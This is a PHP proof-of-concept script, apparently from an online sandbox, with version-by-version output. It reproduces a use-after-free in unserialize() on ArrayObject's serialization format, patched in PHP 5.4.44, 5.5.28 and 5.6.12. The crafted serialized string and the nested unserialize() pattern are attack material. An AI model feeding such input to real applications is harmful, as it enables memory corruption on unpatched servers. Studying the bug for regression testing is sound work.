@ 2015-10-02T11:22:23Z <?php
/**
 * Minimal Serializable implementation that round-trips one property through
 * PHP's native serializer.
 *
 * The crafted string built later in this file names ArrayObject, not this
 * class, so the script never instantiates it.
 */
class obj implements Serializable
{
    /** @var mixed Value encoded by serialize() and restored by unserialize(). */
    public $data;

    /**
     * Encode the wrapped value.
     *
     * @return string Native serialized form of $this->data.
     */
    public function serialize()
    {
        $encoded = serialize($this->data);

        return $encoded;
    }

    /**
     * Restore the wrapped value from its serialized form.
     *
     * NOTE(review): $data goes straight into a nested unserialize() call, so
     * whoever controls the outer serialized string also controls what is
     * parsed here. Only use this pattern when the bytes come from a trusted
     * source.
     *
     * @param string $data Serialized payload supplied by the engine.
     * @return void
     */
    public function unserialize($data)
    {
        $this->data = unserialize($data);
    }
}
// Regression reproducer for unserialize() handling of ArrayObject's custom
// ("C:") serialization format. Statement order matters here, so the code is
// left exactly as published and only annotated.
//
// Inner payload handed to ArrayObject. It reads as three parts: "x:i:1234;"
// (an integer), "a:0:{}" (an empty array) and ";m:a:0:{}" (a second empty
// array). NOTE(review): presumably flags / storage / member table as
// ArrayObject lays them out; confirm against the SPL source for the version
// under test.
$inner = 'x:i:1234;a:0:{};m:a:0:{}';
// Outer value: a two-element array. Slot 0 is the ArrayObject carrying $inner
// (strlen() supplies the declared byte length). Slot 1 is "R:3;", a
// back-reference to the third value the parser produced. On the patched runs
// recorded on this page that slot dumps as int(1234), the integer from $inner.
$exploit = 'a:2:{i:0;C:11:"ArrayObject":'.strlen($inner).':{'.$inner.'}i:1;R:3;}';
// Defensive takeaway: the string above is attacker-shaped input. Application
// code should not pass untrusted bytes to unserialize(). Prefer json_decode()
// for external data and keep the runtime on a release where this case is fixed.
$data = unserialize($exploit);
// Five short strings allocated after parsing and before the dump. $v is
// created implicitly by the first assignment.
// NOTE(review): these look intended to reuse memory released during parsing,
// which would explain the "hi3" result on older builds; confirm.
for ($i = 0; $i < 5; $i++) {
$v[$i] = 'hi'.$i;
}
// Correct result: slot 1 is int(1234). The recorded output for 5.4.2 - 5.4.43,
// 5.5.24 - 5.5.27 and 5.6.7 - 5.6.11 shows string(3) "hi3" in that slot
// instead. That is consistent with the back-reference pointing at a value
// released before the loop ran (a dangling reference inside unserialize).
// Releases from 5.4.44, 5.5.28 and 5.6.12 onward print int(1234).
var_dump($data);
Output for 8.1.0 - 8.1.28 , 8.2.0 - 8.2.19 , 8.3.0 - 8.3.7 Deprecated: obj implements the Serializable interface, which is deprecated. Implement __serialize() and __unserialize() instead (or in addition, if support for old PHP versions is necessary) in /in/cW23S on line 3
array(2) {
[0]=>
object(ArrayObject)#1 (1) {
["storage":"ArrayObject":private]=>
array(0) {
}
}
[1]=>
int(1234)
}
Output for 5.4.44 - 5.4.45 , 5.5.28 - 5.5.35 , 5.6.12 - 5.6.28 , 7.0.0 - 7.0.20 , 7.1.0 - 7.1.20 , 7.2.0 - 7.2.33 , 7.3.16 - 7.3.33 , 7.4.0 - 7.4.33 , 8.0.0 - 8.0.30 array(2) {
[0]=>
object(ArrayObject)#1 (1) {
["storage":"ArrayObject":private]=>
array(0) {
}
}
[1]=>
int(1234)
}
Output for 5.4.2 - 5.4.43 , 5.5.24 - 5.5.27 , 5.6.7 - 5.6.11 array(2) {
[0]=>
object(ArrayObject)#1 (1) {
["storage":"ArrayObject":private]=>
array(0) {
}
}
[1]=>
string(3) "hi3"
}